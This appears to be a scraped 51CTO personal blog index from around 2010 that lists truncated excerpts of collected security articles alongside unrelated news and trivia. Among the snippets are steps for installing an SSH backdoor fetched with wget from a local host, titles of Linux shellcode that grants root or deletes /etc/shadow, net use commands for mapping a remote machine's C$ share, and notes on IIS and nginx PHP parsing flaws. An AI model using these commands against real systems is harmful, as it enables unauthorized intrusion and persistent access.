51CTO博客开发simeon技术专栏Xiaoz绿盟科技黑客笔记黑海洋素包子陆羽 blog看雪软件安全论坛漏洞基地 0dayfinal4ever.com暗组信息安全论坛邪恶八进制cryptome.orgpublicintelligence.net战地之王甲壳虫技术论坛Super-xrat
文章作者:pt007@vip.sina.com 1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old3、下载并安装ssh后门:shell-# wget http://192.168.1.188/sshbd.tgzshell-# tar zxvf sshb
1、终结者2现实版,让ATM自动吐钞 今年最值得期待的演讲会是来自曾在瞻博网络工作过的Barnaby Jack,Jack过去数年一直从事ATM(自动取款机)安全研究,本次大会他将会精彩呈现他发现的部分漏洞,ATM目前是漏洞研究的绿地。 Black Hat大会主席Jeff Moss说ATM漏洞研究使人想起几年前的投票机漏洞研究,当时发现了投票系统的严重漏洞,迫使许多政府机构重新考虑他们的电子投票
社会工程学攻击的八种常用伎俩著名黑客Kevin Mitnick在上世纪90年代让“黑客社会工程学”这个术语流行了起来,不过这个简单的概念本身(引诱某人去做某事,或者泄露敏感信息)却早有年头了。专家们认为,如今的黑客仍在继续采用黑客社会工程学的新老伎俩盗窃密码、安装恶意软件或者攫取利益。 此处所列的是一些最流行的利用电话、email和网络的社会工程学攻
自己收集的东西,感觉受益很大。。。
中国,北京,2010年8月4~5日 (http://xcon.xfocus.net) XCon 秉承一贯的严谨求实作风竭诚欢迎热爱信息安全技术的人员积极投稿,参加会议,共享精彩盛会。 参加会议对象: 任何热爱信息安全
受影响系统: TeamSpeak Systems GmbH TeamSpeak Server <= 3.0.0-beta23描述: BUGTRAQ ID: 40918TeamSpeak是一种专门为网络游戏玩家设计的IP语音通信系统。TeamSpeak服务器在执行通过UDP 9987端口所接收到的受限制命令时没有要求认证,用户可以非授权执行各种管理命令。以下是
Microsoft帮助和支持中心HCP协议处理器远程命令执行0day漏洞发布日期:2010-06-11CVE ID:CVE-2010-1885受影响的软件及系统:====================Windows XP SP2/3Windows Server 2003 SP2未受影响的软件及系统:======================Windows 2000Windows VistaWi
1.3D弹珠台无敌秘籍 启动游戏后在键盘上敲入“hidden test”(不含引号),然后你就会发现弹珠会跟着你的鼠标指针而移动,想撞哪撞哪,想拿多高分都不是问题啦。另外在游戏中按下“H”可进入高分榜,看一看自己的得分,哇10亿分!按下“R”则可以直接升级为“海军少尉”。 2.记事本怪现象 打开记事本输入“Bush hid the facts”(布什隐藏事实真相),保存在重新打开这个文本,如
对于大多数企业局域网来说,路由器已经成为正在使用之中的最重要的安全设备之一。一般来说,大多数网络都有一个主要的接入点。这就是通常与专用防火墙一起使用的“边界路由器”。 经过恰当的设置,边缘路由器能够把几乎所有的最顽固的坏分子挡在网络之外。如果你愿意的话,这种路由器还能够让好人进入网络。不过,没有恰当设置的路由器只是比根本就没有安全措施稍微好一点。 在下列指南中,我们将研究一下你可以用来保护网络
Name : 45 bytes give all user root access when execute /bin/sh x86 linux shellcodeDate : Sat Jun 5 16:10:00 2010Author : gunslinger_ <yudha.gunslinger[
据《金融时报》报道,多位谷歌职员透露,谷歌出于安全考虑,正在内部逐步淘汰微软的Windows系统。 这项行动指令在1月份谷歌宣布退出中国大陆后就开始认真执行,并可能真正结束Windows在谷歌的使用。目前谷歌全球职员总数超过了1万人。 一位谷歌职员表示:“我们将不再使用Windows,这是一次安全行动。”另一位谷歌职员称:“许多人已经抛弃Windows电脑,多数转向 Mac OS”。谷歌新招员
net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除
防止.NET木马列所有站物理路径 程序代码 此木马是一个.NET程序制作,如果你的服务器支持.NET那就要注意了,,进入木马有个功能叫:IIS Spy,点击以后可以看到所有站点所在的物理路径。以前有很多人提出过,但一直没有人给解决的答案。。防御方法:"%SystemRoot%/ServicePackFiles/i386/activeds.dll"%SystemRoot%/sys
命令下vpn设置路由与远程访问rrasmgmt.msc计算机管理 compmgmt.msc-netsh ras set user administrator permit #允许administrator拨入该VPNnetsh ras set user administrator deny #禁止administrator拨入该VPNnetsh ras show user #查看哪些用户可以拨入V
学习网络很长时间了,整理了关于安全方面的一些命令:当谈到配置一台新的Cisco路由器,多数配置依赖于路由器的类型以及它将服务的用途。然而,每位管理员都有其自己的“正确”配置每台路由器的命令列表。笔者将和你分享他自己配置路由器的十条命令列表。 当谈到配置一台新的Cisco路由器,多数配置依赖于路由器的类型以及它将服务的用途。然而,有一些东西是你在每台新的Cisco路由器上都应该配置的。 有哪个命
高手也都是从基础学起的,先学习硬件,然后学习网络,学会大多数软件的操作,买杂志看,先看电脑爱好者,网友世界,再看黑客X档案,非安全,黑客防线,学习要循序渐进,至少掌握2们编程语言,精通TCP/IP协议,精通各种黑客软件的使用,最后用自己编写的工具做事,要经常走动各大黑客论坛,学习加密解密技术,学习要有毅力,有决心,还要看你有没有天赋.对于Linux 其实应该了解基本使用。但是这是高级阶
如果说中国走在网络战争的前沿,你可能觉得胡扯。发动网络战争并不复杂,一般有三种类型:攻击基础设施、窃取机密数据、瘫痪网络服务。而本文,将重点谈及中国窃取机密数据的邮箱情报攻击,几乎从来没有哪个国家能像中国因维稳不惜任何代价而秘密地监听国内外的敏感人士。对于电子邮箱攻击,你注意到国外媒体批露的中国攻击事件与日俱增,如本月9号,纽约时报记者声称他们的邮箱被攻击,而 Twitter上的敏感人士开始越来越
# Title : 33 bytes unlink "/etc/shadow" x86 linux shellcode # Published : 2010-06-02 # Author : gunslinger_ /* Name : 33 bytes unlink "/etc/shadow" x86 linux shellcode Date : Wed Jun 2 18
有时候看过的好文章,关机后就再也找不到了。。有时候挺遗憾的,终于今天建了自己的BLOG !
说起来可能有点令人难以置信,但两位名为Andrea Barisani和Daniele Bianco的安全专家将在本月晚些时候在黑帽美国2009大会上演示一种可怕的窃密方法,这种方法只要求窃密者在被窃对象计算机所接电网中插入探测器, 或者向被窃对象计算机发射激光束,就可以达到窃密的目的,这看起来像极了科幻间谍电影中的某种场景。 这两位安全专家在描述这种窃密技术的文件中称:“你需要做的事仅仅是接入被
Google搜索WebShell的实际处理思路 陈小兵 {Antian365 Security Team} 借助Google搜索的强大功能,在有些时候可以进行投机取巧,顺手牵“鸡”。对于大多数安全爱好者来说,对入侵工具都是拿来主义,稍加修改就投入使用,在这些人中有很多人都喜欢打上自己的标签,例如本案例中的“JFolder New4修改版”,声明“某某到此一游”!实际上在自己攻克某台服务器并留下
韩文的启动目录是: C:\Documents and Settings\All Users\시작 메뉴\프로그램\시작프로그램\ 繁体中文启动目录: C:\Documents and
按照micky演示的方法测试了一天,呵呵,真累,从中发现了几个有趣的东西: (1)有些ica文件中会包含明文密码,有些ica文件中会包含22位、28位的加密字符串,关于这个加密字符串我一直很迷惑,也许只要在本地架设一套环境才能得出答案。 (2)通过Ctrl+F3进入系统后,用户权限较低,需要配合提权工具才行。一般当前用户目录可以写,但不能删除。执行文件权限较低。 (3)Citri
VULNERABLE PRODUCTS #define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)( &
漏洞介绍:IIS是微软推出的一款webserver,使用较为广泛,在支持asp/asp.net的同时还可以较好的支持PHP等其他语言的运行。但是80sec发现在IIS的较高版本中存在一个比较严重的安全问题,在按照网络上提供的默认配置情况下可能导致服务器泄露服务器端脚本源码,也可能错误的将任何类型的文件以PHP的方式进行解析,使得恶意的攻击者可能攻陷支持PHP的IIS服务器,特别是虚拟主机用户可能受
漏洞介绍:nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也可以非常好的支持PHP的运行。80sec发现其中存在一个较为严重的安全问题,默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持php的nginx服务器。 漏洞分析:nginx默认以cgi的方式支持php的运行,譬如在配置文件当中可以以
惊人的财富损耗与生命损耗 时寒冰 住建部副部长仇保兴近日透露,中国是世界上每年新建建筑量最大的国家,但这些建筑只能持续25-30年,而英国建筑的平均寿命达到132年。 很多人看到这则新闻的时候,并不觉得有什么问题,最多对房屋质量产生些憎恶。
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号
